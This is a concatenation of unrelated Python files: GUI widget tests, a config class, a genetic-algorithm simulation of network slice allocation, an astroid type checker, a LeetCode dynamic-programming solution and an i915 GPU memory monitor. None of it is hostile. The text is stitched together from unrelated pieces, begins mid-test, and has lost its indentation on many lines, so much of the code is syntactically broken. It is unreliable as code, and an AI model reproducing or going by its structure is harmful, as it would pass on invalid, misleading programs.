self.controller.update_alpha(75.)
assert self.model.alpha_value == 75.
self.controller.update_alpha(-1)
assert self.model.alpha_value == 0.
self.controller.update_alpha(-100000)
assert self.model.alpha_value == 0.
self.controller.update_alpha(101)
assert self.model.alpha_value == 100.
self.controller.update_alpha(10000)
assert self.model.alpha_value == 100.
self.controller.update_alpha(0)
assert self.model.alpha_value == 0.
self.controller.update_alpha(100)
assert self.model.alpha_value == 100.
class TestBandWidget(object):
test_images = pdsview.ImageSet(test_files)
window = pdsview.PDSViewer(test_images)
channels_model = channels_dialog.ChannelsDialogModel(window)
model = band_widget.BandWidgetModel(
channels_model, 0, 'Test')
band = band_widget.BandWidget(model)
def check_menu_text(self):
for index, name in enumerate(self.channels_model.image_names):
assert self.band.menu.itemText(index) == name
def test_init(self):
assert self.band.model == self.model
assert isinstance(
self.band.controller, band_widget.BandWidgetController
)
assert isinstance(self.band.menu, QtWidgets.QComboBox)
assert isinstance(self.band.alpha_slider, QtWidgets.QSlider)
assert isinstance(self.band.alpha_value, QtWidgets.QLabel)
assert isinstance(self.band.alpha_label, QtWidgets.QLabel)
assert isinstance(self.band.layout, QtWidgets.QGridLayout)
self.check_menu_text()
assert self.band.alpha_value.text() == str(int(self.model.max_alpha))
assert self.band.alpha_label.text() == 'Test %'
assert self.band.alpha_slider.value() == self.model.max_alpha
def test_add_text_to_menu(self):
self.check_menu_text()
test_names = ['foo', 'bar']
self.band.add_text_to_menu(test_names)
num_names = len(self.channels_model.image_names)
assert self.band.menu.itemText(num_names + 0) == test_names[0]
assert self.band.menu.itemText(num_names + 1) == test_names[1]
self.band.menu.removeItem(num_names + 0)
self.band.menu.removeItem(num_names + 1)
self.check_menu_text()
def test_set_current_index(self):
assert self.band.menu.currentIndex() == 0
self.model.index = 1
self.band.set_current_index()
assert self.band.menu.currentIndex() == 1
self.model.index = 0
self.band.set_current_index()
assert self.band.menu.currentIndex() == 0
def test_image_selected(self):
assert self.model.index == 0
new_index = 1
new_selected_image = self.channels_model.images[new_index]
self.band.image_selected(new_index)
assert self.model.index == new_index
assert self.model.selected_image == new_selected_image
new_index = 0
new_selected_image = self.channels_model.images[new_index]
self.band.image_selected(new_index)
assert self.model.index == new_index
assert self.model.selected_image == new_selected_image
def test_value_changed(self):
assert self.model.alpha_value == 100.
assert self.band.alpha_value.text() == '100'
self.band.alpha_slider.setValue(50.)
assert self.model.alpha_value == 50.
assert self.band.alpha_value.text() == '50'
self.band.alpha_slider.setValue(75.)
assert self.model.alpha_value == 75.
assert self.band.alpha_value.text() == '75'
self.band.alpha_slider.setValue(-1)
assert self.model.alpha_value == 0.
assert self.band.alpha_value.text() == '0'
self.band.alpha_slider.setValue(-100000)
assert self.model.alpha_value == 0.
assert self.band.alpha_value.text() == '0'
self.band.alpha_slider.setValue(101)
assert self.model.alpha_value == 100.
assert self.band.alpha_value.text() == '100'
self.band.alpha_slider.setValue(10000)
assert self.model.alpha_value == 100.
self.band.alpha_slider.setValue(0)
assert self.band.alpha_value.text() == '0'
assert self.model.alpha_value == 0.
self.band.alpha_slider.setValue(100)
assert self.model.alpha_value == 100.
assert self.band.alpha_value.text() == '100'
|
class SWBFConfig:
def __init__(self, filename):
self._filename = filename
self._properties = {}
    def __getitem__(self, item):
        if item in self._properties:
            return self._properties[item]
        return None
def __setitem__(self, key, value):
self._properties[key] = value
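# --- Hedged usage sketch (added for illustration, not in the original file):
# cfg = SWBFConfig("server.cfg")
# cfg["max_players"] = 32
# print(cfg["max_players"])   # 32
# print(cfg["missing"])       # None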
|
#!usr/bin/env python
# -*- coding:utf-8 -*-
# Stable version: adds persistence of intermediate data; under high network load, also records the number of requests refused service
import math
import sys
import time
import numpy as np
import random
import simu.greedy as greedy
import simu.greedy_computing as greedy_computing
import simu.greedy_down_bandwidth as greedy_down_bandwidth
import simu.greedy_up_bandwidth as greedy_up_bandwidth
import simu.greedy_resource as greedy_resource
import simu.RandomSelect as random_select
import simu.greedy_bandwidth as greedy_bandwidth
import json
import simu.plot as pt
def check(sr, rbsc, chromosome):
m = np.size(sr, 0)
n = np.size(rbsc, 0)
for i in range(n):
down_bandwidth = 0
up_bandwidth = 0
process = 0
for j in range(m):
try:
down_bandwidth += chromosome[j][i] * sr[j][0]
except:
print(chromosome)
print(sr)
up_bandwidth += chromosome[j][i] * sr[j][1]
process += chromosome[j][i] * sr[j][2]
if down_bandwidth > rbsc[i][0] or up_bandwidth > rbsc[i][1] or process > rbsc[i][2]:
return False
return True
# An individual is therefore an M*N array (constraints: each row contains only one 1, and the resources requested in each column must not exceed the base station's remaining resources); the whole population is an L*M*N matrix
def getInitialPopulation(sr, rbsc, populationSize, delta=0.000000001):
m = np.size(sr, 0)
n = np.size(rbsc, 0)
chromosomes_list = []
####################################################################################
cost, rbsc_realtime, solution = greedy_resource.greedy_min_cost(sr, rbsc, delta)
if check(sr, rbsc, solution):
chromosomes_list.append(solution)
populationSize -= 1
cost, rbsc_realtime, solution = greedy.greedy_min_cost(sr, rbsc, delta)
if check(sr, rbsc, solution):
chromosomes_list.append(solution)
populationSize -= 1
cost, rbsc_realtime, solution = greedy_down_bandwidth.greedy_min_down_bandwidth_cost(sr, rbsc, delta)
if check(sr, rbsc, solution):
chromosomes_list.append(solution)
populationSize -= 1
cost, rbsc_realtime, solution = greedy_up_bandwidth.greedy_min_up_bandwidth_cost(sr, rbsc, delta)
if check(sr, rbsc, solution):
chromosomes_list.append(solution)
populationSize -= 1
cost, rbsc_realtime, solution = greedy_computing.greedy_min_compute_cost(sr, rbsc, delta)
if check(sr, rbsc, solution):
chromosomes_list.append(solution)
populationSize -= 1
####################################################################################
for i in range(populationSize):
        # randomly generate one chromosome
chromosome = np.zeros((m, n), dtype=int)
rbsc_realtime = np.array(rbsc)
# flag_of_matrix = 1
        # generate one row of the chromosome matrix at a time
l = np.arange(m)
np.random.shuffle(l)
for j in l:
            min_cost_j = sys.maxsize
            min_bs_j = -1
            for bs_of_select in range(n):
                if sr[j][0] < rbsc_realtime[bs_of_select][0] and sr[j][1] < rbsc_realtime[bs_of_select][1] \
                        and sr[j][2] < rbsc_realtime[bs_of_select][2]:
                    # relative cost of placing request j on this base station
                    cost_j = sr[j][0] / rbsc_realtime[bs_of_select][0] \
                        + sr[j][1] / rbsc_realtime[bs_of_select][1] \
                        + sr[j][2] / rbsc_realtime[bs_of_select][2]
                    if cost_j < min_cost_j:
                        min_cost_j = cost_j
                        min_bs_j = bs_of_select
if min_bs_j != -1:
chromosome[j][min_bs_j] = 1
rbsc_realtime[min_bs_j][0] -= sr[j][0]
rbsc_realtime[min_bs_j][1] -= sr[j][1]
rbsc_realtime[min_bs_j][2] -= sr[j][2]
        # append the generated chromosome to chromosomes_list
chromosomes_list.append(chromosome)
chromosomes = np.array(chromosomes_list)
return chromosomes
# Compute each individual's fitness (bandwidth and computing costs) and its cumulative selection probability
def getFitnessValue(sr, rbsc, chromosomes, delta):
penalty = 10
populations, m, n = np.shape(chromosomes)
    # fitness table: one row per chromosome with six entries: down-bandwidth cost, up-bandwidth cost, computing cost, total cost, selection probability, cumulative probability
fitness = np.zeros((populations, 6))
for i in range(populations):
        # take the i-th chromosome
rbsc_realtime = np.array(rbsc)
chromosome = chromosomes[i]
cost_of_down_bandwidth = 0
cost_of_up_bandwidth = 0
cost_of_computing = 0
for j in range(m):
if np.sum(chromosome[j, :]) == 0:
# cost_of_down_bandwidth += penalty
# cost_of_up_bandwidth += penalty
# cost_of_computing += penalty
fitness[i][3] += 30
continue
for k in range(n):
if chromosome[j][k] == 1:
cost_of_down_bandwidth += sr[j][0] / (rbsc_realtime[k][0] + delta)
cost_of_up_bandwidth += sr[j][1] / (rbsc_realtime[k][1] + delta)
cost_of_computing += sr[j][2] / (rbsc_realtime[k][2] + delta)
rbsc_realtime[k][0] -= sr[j][0]
rbsc_realtime[k][1] -= sr[j][1]
rbsc_realtime[k][2] -= sr[j][2]
break
fitness[i][0] = cost_of_down_bandwidth
fitness[i][1] = cost_of_up_bandwidth
fitness[i][2] = cost_of_computing
fitness[i][3] += cost_of_down_bandwidth + cost_of_up_bandwidth + cost_of_computing
    # compute the selection probabilities (lower total cost => higher probability)
sum_of_fitness = 0
if populations > 1:
for i in range(populations):
sum_of_fitness += fitness[i][3]
for i in range(populations):
fitness[i][4] = (sum_of_fitness - fitness[i][3]) / ((populations - 1) * sum_of_fitness)
else:
fitness[0][4] = 1
fitness[:, 5] = np.cumsum(fitness[:, 4])
return fitness
# Selection operator
def selectNewPopulation(chromosomes, cum_probability):
populations, m, n = np.shape(chromosomes)
newpopulation = np.zeros((populations, m, n), dtype=int)
    # draw `populations` uniform random values
randoms = np.random.rand(populations)
for i, randoma in enumerate(randoms):
logical = cum_probability >= randoma
index = np.where(logical == 1)
        # index is a tuple whose elements are ndarrays
newpopulation[i, :, :] = chromosomes[index[0][0], :, :]
return newpopulation
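# --- Hedged standalone sketch (added for illustration, not in the original file) of
# the roulette-wheel mechanics selectNewPopulation relies on: a uniform draw is
# mapped to the first individual whose cumulative probability reaches it.
# cum_probability = np.array([0.1, 0.4, 0.8, 1.0])   # e.g. fitness[:, 5]
# r = np.random.rand()
# picked = np.where(cum_probability >= r)[0][0]      # index of the selected individual
# print(r, picked)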
# Crossover of the selected population
def crossover(sr, rbsc, population, pc=0.8):
"""
:param rbsc:
:param sr:
:param population: 新种群
:param pc: 交叉概率默认是0.8
:return: 交叉后得到的新种群
"""
populations, m, n = np.shape(population)
random_pop = np.arange(populations)
np.random.shuffle(random_pop)
random_pop = list(random_pop)
    # holds the population produced by crossover
updatepopulation = np.zeros((populations, m, n), dtype=int)
while len(random_pop) > 0:
if len(random_pop) == 1:
updatepopulation[populations - 1] = population[random_pop.pop()]
break
a = random_pop.pop()
b = random_pop.pop()
l = len(random_pop)
father = population[a]
mather = population[b]
younger_brother = np.zeros((m, n))
elder_brother = np.zeros((m, n))
        # multiple probing attempts could be added here
for i in range(m):
p = random.uniform(0, 1)
if p < pc:
younger_brother[i] = mather[i]
elder_brother[i] = father[i]
else:
younger_brother[i] = father[i]
elder_brother[i] = mather[i]
if check(sr, rbsc, younger_brother) and check(sr, rbsc, elder_brother):
continue
else:
temp = elder_brother[i]
elder_brother[i] = younger_brother[i]
younger_brother[i] = temp
if check(sr, rbsc, younger_brother) and check(sr, rbsc, elder_brother):
continue
else:
                    # give up on this crossover pair
elder_brother = mather
younger_brother = father
break
updatepopulation[populations - l - 2] = elder_brother
updatepopulation[populations - l - 1] = younger_brother
return updatepopulation
# Chromosome mutation
def mutation(sr, rbsc, population, pm=0.01):
"""
:param rbsc:
:param sr:
:param population: 经交叉后得到的种群
:param pm: 变异概率默认是0.01
:return: 经变异操作后的新种群
"""
updatepopulation = np.copy(population)
populations, m, n = np.shape(population)
    # number of genes to mutate
    gene_num = np.uint8(populations * m * n * pm)
    # index every gene with a decimal serial number: populations * m * n genes in total
    # randomly pick gene_num of them for single-bit mutation
    mutationGeneIndex = random.sample(range(0, populations * m * n), gene_num)
    # locate each gene to be mutated within the whole population
    for gene in mutationGeneIndex:
        # which chromosome the gene belongs to
        chromosomeIndex = gene // (m * n)
        # position of the gene within that chromosome
        geneIndex = gene % (m * n)
        # row of the chromosome matrix (which request)
        sr_location = geneIndex // n
        # column of the chromosome matrix (which base station)
        bs_location = geneIndex % n
# mutation
chromosome = np.array(population[chromosomeIndex])
if chromosome[sr_location, bs_location] == 0:
for i in range(n):
chromosome[sr_location, i] = 0
chromosome[sr_location, bs_location] = 1
else:
chromosome[sr_location, bs_location] = 0
j = random.randint(0, n - 1)
chromosome[sr_location, j] = 1
if check(sr, rbsc, chromosome):
updatepopulation[chromosomeIndex] = np.copy(chromosome)
return updatepopulation
# Update the remaining base-station capacity after applying a solution
def update_rbsc(sr, rbsc, solution):
m, n = np.shape(solution)
rbsc_realtime = np.array(rbsc)
chromosome = solution
for j in range(m):
for k in range(n):
if chromosome[j][k] == 1:
rbsc_realtime[k][0] -= sr[j][0]
rbsc_realtime[k][1] -= sr[j][1]
rbsc_realtime[k][2] -= sr[j][2]
break
return rbsc_realtime
def ga(SR, RBSC, max_iter=500, delta=0.0001, pc=0.8, pm=0.01, populationSize=10):
    # best solution found at each iteration
optimalSolutions = []
optimalValues = []
    # edge case: when there is only one request
m = np.size(SR, 0)
n = np.size(RBSC, 0)
if m == 1:
chromosomes = np.zeros((n, 1, n))
for i in range(n):
chromosomes[i][0][i] = 1
check_list = []
for i in range(n):
if check(SR, RBSC, chromosomes[i]):
check_list.append(i)
if len(check_list) == 0:
return "failed", -1
chromosomes = np.zeros((len(check_list), 1, n))
for i in range(len(check_list)):
chromosomes[i][0][check_list[i]] = 1
fitness = getFitnessValue(SR, RBSC, chromosomes, delta)
optimalValues.append(np.min(list(fitness[:, 3])))
index = np.where(fitness[:, 3] == min(list(fitness[:, 3])))
optimalSolutions.append(chromosomes[index[0][0], :, :])
optimalValue = np.min(optimalValues)
optimalIndex = np.where(optimalValues == optimalValue)
optimalSolution = optimalSolutions[optimalIndex[0][0]]
return optimalSolution, optimalValue
    # build the encoded initial population
chromosomes = getInitialPopulation(SR, RBSC, populationSize)
population_num = np.size(chromosomes, 0)
if population_num == 0:
return "failed", -1
fitness = getFitnessValue(SR, RBSC, chromosomes, delta)
optimalValues.append(np.min(list(fitness[:, 3])))
index = np.where(fitness[:, 3] == min(list(fitness[:, 3])))
optimalSolutions.append(chromosomes[index[0][0], :, :])
for iteration in range(max_iter):
        # compute fitness values and cumulative selection probabilities
fitness = getFitnessValue(SR, RBSC, chromosomes, delta)
        # select the next population
cum_proba = fitness[:, 5]
        try:
            newpopulations = selectNewPopulation(chromosomes, cum_proba)
        except Exception:
            print("except in ga:", population_num, chromosomes, np.size(chromosomes, 0), np.shape(chromosomes))
            raise
        # crossover
crossoverpopulation = crossover(SR, RBSC, newpopulations, pc)
# mutation
mutationpopulation = mutation(SR, RBSC, crossoverpopulation, pm)
        # fitness evaluation
fitness = getFitnessValue(SR, RBSC, mutationpopulation, delta)
        # track this iteration's best solution and its objective value
optimalValues.append(np.min(list(fitness[:, 3])))
index = np.where(fitness[:, 3] == min(list(fitness[:, 3])))
optimalSolutions.append(mutationpopulation[index[0][0], :, :])
chromosomes = mutationpopulation
    # pick the best solution across all iterations
optimalValue = np.min(optimalValues)
optimalIndex = np.where(optimalValues == optimalValue)
optimalSolution = optimalSolutions[optimalIndex[0][0]]
return optimalSolution, optimalValue
def getRbsc(bs_num):
    rbsc = np.zeros((bs_num, 3), dtype=float)
# rbsc = 1.5 - rbsc
# r1 = 5
# r2 = 3
# r3 = 1
r1 = 5
r2 = 2.5
r3 = 1.25
rbsc[0][0] = r1
rbsc[0][1] = r2
rbsc[0][2] = r3
rbsc[1][0] = r1
rbsc[1][1] = r3
rbsc[1][2] = r2
rbsc[2][0] = r2
rbsc[2][1] = r3
rbsc[2][2] = r1
rbsc[3][0] = r2
rbsc[3][1] = r1
rbsc[3][2] = r3
rbsc[4][0] = r3
rbsc[4][1] = r1
rbsc[4][2] = r2
rbsc[5][0] = r3
rbsc[5][1] = r2
rbsc[5][2] = r1
return rbsc
def simu(request_num=15, req_num_eachtime=4, sigma=50000, max_iter=1):
bs_num = 6
# BSC:base station capacity
# RBSC: residuary base station capacity
# SR: slice request
    max_iter = 1  # NOTE: overrides the max_iter argument (debug leftover)
delta = 0.000000001
pc = 0.8
pm = 0.01
# req_num_eachtime = 4
    # Build request_num rounds of requests
# request_num = 15 # --------------------------
    values = np.zeros(request_num, dtype=float)
solutions = []
sr_all = []
rbscs = []
    # Slice requests that failed per round: fails[0] GA, fails[1] greedy total cost, fails[2] greedy downlink bandwidth, fails[3] greedy uplink bandwidth, fails[4] greedy computing
fails = np.zeros((7, request_num))
    # Downlink, uplink, computing, and total cost per round for each of the 7 algorithms
    cost_result = np.zeros((7, request_num, 4), dtype=float)
# sigma = 50000
    # Build m slice requests
m = req_num_eachtime * request_num
    sr_total = np.zeros((m, 3), dtype=float)
for i in range(m):
s = np.abs(np.random.normal(100, sigma, 3)) + 1
s = s / (sum(s))
sr_total[i] = s
for iter in range(request_num):
print('iter')
print(iter)
        # Number of slice requests in this round grows by req_num_eachtime
m = (iter + 1) * req_num_eachtime
        # Build base station resources
rbsc = getRbsc(bs_num)
        total_rbsc = np.sum(rbsc, 0)  # column sums: 1x3 totals of downlink, uplink, computing resources
        # Build m slice requests
        sr = np.zeros((m, 3), dtype=float)
for i in range(m):
s = sr_total[i]
sr[i] = s
rbscs.append(rbsc)
print("rbsc:")
print(rbsc)
print("sr:")
print(sr)
        sr_all.append(sr)  # record the requests so the other algorithms see the same environment
populationSize = min(m * bs_num, 50)
solution, value = ga(sr, rbsc, max_iter, delta, pc, pm, populationSize)
        # When resources are tight, fall back to the greedy algorithms to find a feasible subset
while solution == "failed" and np.size(sr, 0) >= 2:
            cost, rbsc_r, solution = greedy.greedy_min_cost(sr, rbsc, delta)
            x1 = np.sum(solution, 1)  # row sums
            cost, rbsc_r, solution = greedy_resource.greedy_min_cost(sr, rbsc, delta)
            x2 = np.sum(solution, 1)  # row sums
            cost, rbsc_r, solution = greedy_down_bandwidth.greedy_min_down_bandwidth_cost(sr, rbsc, delta)
            x3 = np.sum(solution, 1)  # row sums
            cost, rbsc_r, solution = greedy_up_bandwidth.greedy_min_up_bandwidth_cost(sr, rbsc, delta)
            x4 = np.sum(solution, 1)  # row sums
            cost, rbsc_r, solution = greedy_computing.greedy_min_compute_cost(sr, rbsc, delta)
            x5 = np.sum(solution, 1)  # row sums
XX = np.array((x1, x2, x3, x4, x5))
X = np.array((np.sum(x1), np.sum(x2), np.sum(x3), np.sum(x4), np.sum(x5)))
x = np.max(X)
            if x == 0:
                solution = "failed"  # was 'solution == "failed"', a no-op comparison
                value = 0
                sr = np.array([])
                break
index = np.where(X == x)
x = XX[index[0][0]]
sr_list = []
for s in range(np.size(x)):
if x[s] == 1:
sr_list.append(sr[s])
sr = np.array(sr_list)
solution, value = ga(sr, rbsc, max_iter, delta, pc, pm, populationSize)
        # Record the number of failed requests
fails[0][iter] = np.size(sr_all[iter], 0) - np.sum(np.sum(solution))
        print('Optimal objective value:', value)
values[iter] = value
print('solution:')
print(solution)
##############################
        # Persist results
fit = getFitnessValue(sr, rbsc, [solution], delta)
o = [fit[0, 0], fit[0, 1], fit[0, 2], fit[0, 3]]
cost_result[0][iter][0] = fit[0, 0]
cost_result[0][iter][1] = fit[0, 1]
cost_result[0][iter][2] = fit[0, 2]
cost_result[0][iter][3] = fit[0, 0] + fit[0, 1] + fit[0, 2]
result = {iter: o}
# json.dump(result, fp1)
##############################
solutions.append(np.copy(solution))
# rbsc = update_rbsc(sr, rbsc, solution)
print("ga总结果")
print(values)
# print(rbsc)
###########################################################################################################
for i in range(request_num):
sr = sr_all[i]
rbsc = rbscs[i]
cost, rbsc, solution = greedy.greedy_min_cost(sr, rbsc, delta)
values[i] = cost
##############################
        # Persist results
fit = getFitnessValue(sr, rbscs[i], [solution], delta)
o = [fit[0, 0], fit[0, 1], fit[0, 2], fit[0, 3]]
cost_result[1][i][0] = fit[0, 0]
cost_result[1][i][1] = fit[0, 1]
cost_result[1][i][2] = fit[0, 2]
cost_result[1][i][3] = fit[0, 0] + fit[0, 1] + fit[0, 2]
result = {i: o}
##############################
        # Record the failure count
fails[1][i] = np.size(sr, 0) - np.sum(np.sum(solution, 0), 0)
print("greedy_min_cost总结果")
print(values)
##############################################################################################################
for i in range(request_num):
sr = sr_all[i]
rbsc = rbscs[i]
# cost, rbsc, solution = greedy_down_bandwidth.greedy_min_down_bandwidth_cost(sr, rbsc, delta)
cost, rbsc, solution = greedy_bandwidth.greedy_min_bandwidth_cost(sr, rbsc, delta)
values[i] = cost
##############################
        # Persist results
fit = getFitnessValue(sr, rbscs[i], [solution], delta)
o = [fit[0, 0], fit[0, 1], fit[0, 2], fit[0, 3]]
cost_result[2][i][0] = fit[0, 0]
cost_result[2][i][1] = fit[0, 1]
cost_result[2][i][2] = fit[0, 2]
cost_result[2][i][3] = fit[0, 0] + fit[0, 1] + fit[0, 2]
result = {i: o}
##############################
        # Record the failure count
fails[2][i] = np.size(sr, 0) - np.sum(np.sum(solution, 0), 0)
print("greedy_min_bandwidth_cost总结果")
print(values)
##############################################################################################################
for i in range(request_num):
sr = sr_all[i]
rbsc = rbscs[i]
cost, rbsc, solution = greedy_up_bandwidth.greedy_min_up_bandwidth_cost(sr, rbsc, delta)
values[i] = cost
##############################
        # Persist results
fit = getFitnessValue(sr, rbscs[i], [solution], delta)
o = [fit[0, 0], fit[0, 1], fit[0, 2], fit[0, 3]]
cost_result[3][i][0] = fit[0, 0]
cost_result[3][i][1] = fit[0, 1]
cost_result[3][i][2] = fit[0, 2]
cost_result[3][i][3] = fit[0, 0] + fit[0, 1] + fit[0, 2]
result = {i: o}
##############################
        # Record the failure count
fails[3][i] = np.size(sr, 0) - np.sum(np.sum(solution, 0), 0)
print("greedy_min_up_bandwidth_cost总结果")
print(values)
##############################################################################################################
for i in range(request_num):
sr = sr_all[i]
rbsc = rbscs[i]
cost, rbsc, solution = greedy_computing.greedy_min_compute_cost(sr, rbsc, delta)
values[i] = cost
##############################
        # Persist results
fit = getFitnessValue(sr, rbscs[i], [solution], delta)
o = [fit[0, 0], fit[0, 1], fit[0, 2], fit[0, 3]]
cost_result[4][i][0] = fit[0, 0]
cost_result[4][i][1] = fit[0, 1]
cost_result[4][i][2] = fit[0, 2]
cost_result[4][i][3] = fit[0, 0] + fit[0, 1] + fit[0, 2]
result = {i: o}
##############################
        # Record the failure count
fails[4][i] = np.size(sr, 0) - np.sum(np.sum(solution, 0))
print("greedy_min_compute_cost总结果")
print(values)
##############################################################################################################
for i in range(request_num):
sr = sr_all[i]
rbsc = rbscs[i]
cost, rbsc, solution = greedy_resource.greedy_min_cost(sr, rbsc, delta)
values[i] = cost
##############################
        # Persist results
fit = getFitnessValue(sr, rbscs[i], [solution], delta)
o = [fit[0, 0], fit[0, 1], fit[0, 2], fit[0, 3]]
cost_result[5][i][0] = fit[0, 0]
cost_result[5][i][1] = fit[0, 1]
cost_result[5][i][2] = fit[0, 2]
cost_result[5][i][3] = fit[0, 0] + fit[0, 1] + fit[0, 2]
result = {i: o}
        # Record the failure count
fails[5][i] = np.size(sr, 0) - np.sum(np.sum(solution, 0), 0)
print("greedy_min_max_cost总结果")
print(values)
##############################################################################################################
for i in range(request_num):
sr = sr_all[i]
rbsc = rbscs[i]
cost, rbsc, solution = random_select.random_select(sr, rbsc, delta)
values[i] = cost
##############################
        # Persist results
fit = getFitnessValue(sr, rbscs[i], [solution], delta)
o = [fit[0, 0], fit[0, 1], fit[0, 2], fit[0, 3]]
cost_result[6][i][0] = fit[0, 0]
cost_result[6][i][1] = fit[0, 1]
cost_result[6][i][2] = fit[0, 2]
cost_result[6][i][3] = fit[0, 0] + fit[0, 1] + fit[0, 2]
result = {i: o}
        # Record the failure count
fails[6][i] = np.size(sr, 0) - np.sum(np.sum(solution, 0), 0)
print("random总结果")
print(values)
##############################################################################################################
print(fails)
# nowtime = (lambda: int(round(time.time() * 1000)))
# nowtime = nowtime()
# print(cost_result[:, :, 0])
# print(cost_result[:, :, 1])
# print(cost_result[:, :, 2])
# print(cost_result[:, :, 3])
    # pt.plot_fun_slot(cost_result[:, :, 0], fails, req_num_eachtime, 'Number of slice requests', 'Average downlink bandwidth mapping cost',
    #                  str(nowtime) + 'downlink bandwidth mapping cost' + '_' + str(sigma))
    # pt.plot_fun_slot(cost_result[:, :, 1], fails, req_num_eachtime, 'Number of slice requests', 'Average uplink bandwidth mapping cost',
    #                  str(nowtime) + 'uplink bandwidth mapping cost' + '_' + str(sigma))
    # pt.plot_fun_slot(cost_result[:, :, 2], fails, req_num_eachtime, 'Number of slice requests', 'Average computing resource mapping cost',
    #                  str(nowtime) + 'computing resource mapping cost' + '_' + str(sigma))
    # pt.plot_fun_slot(cost_result[:, :, 3], fails, req_num_eachtime, 'Number of slice requests', 'Average total mapping cost',
    #                  str(nowtime) + 'total mapping cost' + '_' + str(sigma))
    # pt.plot_fun_fail_slot(fails, req_num_eachtime, 'Number of slice requests', 'Failure rate (%)', str(nowtime) + 'failure rate' + '_' + str(sigma))
return cost_result, fails
if __name__ == '__main__':
request_num = 15
req_num_eachtime = 6
sigma = 5000
max_iter = 1
    cost_result = np.zeros((7, request_num, 4), dtype=float)
fails = np.zeros((7, request_num))
    # Average over multiple runs
n = 1000
for i in range(n):
cost_result_, fails_ = simu(request_num, req_num_eachtime, sigma, max_iter)
cost_result += cost_result_
fails += fails_
cost_result /= n
fails /= n
nowtime = (lambda: int(round(time.time() * 1000)))
nowtime = nowtime()
    pt.plot_fun_slot(cost_result[:, :, 0], fails, req_num_eachtime, 'Number of slice requests', 'Average downlink bandwidth mapping cost',
                     str(nowtime) + 'downlink bandwidth mapping cost' + '_' + str(max_iter) + '_' + str(n))
    pt.plot_fun_slot(cost_result[:, :, 1], fails, req_num_eachtime, 'Number of slice requests', 'Average uplink bandwidth mapping cost',
                     str(nowtime) + 'uplink bandwidth mapping cost' + '_' + str(max_iter))
    pt.plot_fun_slot(cost_result[:, :, 2], fails, req_num_eachtime, 'Number of slice requests', 'Average computing resource mapping cost',
                     str(nowtime) + 'computing resource mapping cost' + '_' + str(max_iter))
    pt.plot_fun_slot((cost_result[:, :, 0] + cost_result[:, :, 1]), fails, req_num_eachtime, 'Number of slice requests',
                     'Average bandwidth mapping cost',
                     str(nowtime) + 'bandwidth mapping cost' + '_' + str(max_iter))
    pt.plot_fun_slot(cost_result[:, :, 3], fails, req_num_eachtime, 'Number of slice requests', 'Average total mapping cost',
                     str(nowtime) + 'total mapping cost' + '_' + str(sigma))
    pt.plot_fun_fail_slot(fails, req_num_eachtime, 'Number of slice requests', 'Failure rate (%)', str(nowtime) + 'failure rate' + '_' + str(max_iter))
print(cost_result[:, :, 0])
print(cost_result[:, :, 1])
print(cost_result[:, :, 2])
print(cost_result[:, :, 3])
print(fails)
|
from .logo import logoplot
from .utils import AMINO_ACIDS, DNA
|
__author__ = 'schneg'
from collections import defaultdict
from astroid import builder
from astroid.utils import ASTWalker
from astroid.exceptions import InferenceError
from astroid.inference import InferenceContext, CallContext
abuilder = builder.AstroidBuilder()
def infer(node):
try:
return list(node.infer())
except InferenceError:
return ""
def convertible(from_type, to_type):
if from_type == to_type:
return True
if ((from_type == int and to_type == float) or
(from_type == float and to_type == int)):
return True
if from_type == str or to_type == str:
return False
try:
if issubclass(from_type, to_type) or issubclass(to_type, from_type):
return True
except TypeError:
pass
# TODO: this is pretty arbitrary where this line is drawn
return False
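# Quick sanity check (illustrative, not part of the original file): int and
# float are treated as mutually convertible, while str never converts implicitly.
assert convertible(int, float) and not convertible(int, str)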
def collision_in(infer_list):
already_found = []
for item in infer_list:
item_type = item.pytype()
if not already_found:
already_found.append(item_type)
else:
for other_type in already_found:
if not convertible(item_type, other_type):
raise Exception("Found type %s which conflicts with type %s" % (item_type, other_type))
if item_type not in already_found:
already_found.append(item_type)
return False
class MatchFunc:
def __init__(self, path):
self.path = path
def set_context(self, node, child_node):
pass
def visit_assname(self, node):
"""Look for functions with the same name
Should include imported modules and functions
referenced from classes
"""
        if collision_in(node.infer()):
            raise Exception("Collision: %s" % list(node.infer()))
def check(path: str, node):
print("In path %s %s" % (path, node))
ASTWalker(MatchFunc(path)).walk(node)
|
#
# @lc app=leetcode.cn id=198 lang=python3
#
# [198] House Robber
#
# @lc code=start
from typing import List
class Solution:
def rob(self, nums: List[int]) -> int:
"""
        Bottom-up DP: dp_i_1 and dp_i_2 hold dp[i+1] and dp[i+2]
"""
n = len(nums)
dp_i_0, dp_i_1, dp_i_2 = 0, 0, 0
for i in range(n-1, -1, -1):
dp_i_0 = max(dp_i_1, dp_i_2 + nums[i])
dp_i_1, dp_i_2 = dp_i_0, dp_i_1
return dp_i_0
# @lc code=end
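# Local usage sketch (an assumption, not part of the LeetCode submission):
if __name__ == '__main__':
    print(Solution().rob([2, 7, 9, 3, 1]))  # expected 12 (rob houses 2 + 9 + 1)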
|
#!/usr/bin/env python3
"""gem2log"""
from argparse import ArgumentParser
from ctypes import CDLL
from signal import SIGHUP, SIGINT, SIGQUIT, SIGTERM, signal
from sys import exit
from time import sleep
import logging
# Assumption: the original script sets these up during (omitted) argument
# parsing; default to console-only output here so log() is self-contained.
separate_log = False
def log(msg):
    """Print a message and mirror it to the log file when enabled."""
    print(msg)
    if separate_log:
        logging.info(msg)
def mlockall():
"""
"""
MCL_CURRENT = 1
MCL_FUTURE = 2
MCL_ONFAULT = 4
libc = CDLL(None, use_errno=True)
result = libc.mlockall(MCL_CURRENT | MCL_FUTURE | MCL_ONFAULT)
if result != 0:
result = libc.mlockall(MCL_CURRENT | MCL_FUTURE)
gem_path = '/sys/kernel/debug/dri/0/i915_gem_objects'
MIB = 1024**2
def check_gem():
"""
"""
with open(gem_path) as f:
x = f.readline()
a1, _, a2 = x.partition(', ')
b = int(a2.split(' ')[0])
c = '{}, {} MiB'.format(a1, round(b / MIB, 1))
return c
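# Example (illustrative; the exact format of i915_gem_objects varies by kernel
# version): a first line of "1117 objects, 514572288 bytes" would be reported
# by check_gem() as "1117 objects, 490.7 MiB".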
def signal_handler(signum, frame):
"""
"""
def signal_handler_inner(signum, frame):
pass
for i in sig_list:
signal(i, signal_handler_inner)
print()
exit()
try:
with open(gem_path) as f:
f.readline()
except Exception as e:
print(e)
exit(1)
mlockall()
sig_list = [SIGTERM, SIGINT, SIGQUIT, SIGHUP]
sig_dict = {
SIGINT: 'SIGINT',
SIGQUIT: 'SIGQUIT',
SIGHUP: 'SIGHUP',
SIGTERM: 'SIGTERM'
}
for i in sig_list:
signal(i, signal_handler)
interval = 2
while True:
print(check_gem())
sleep(interval)
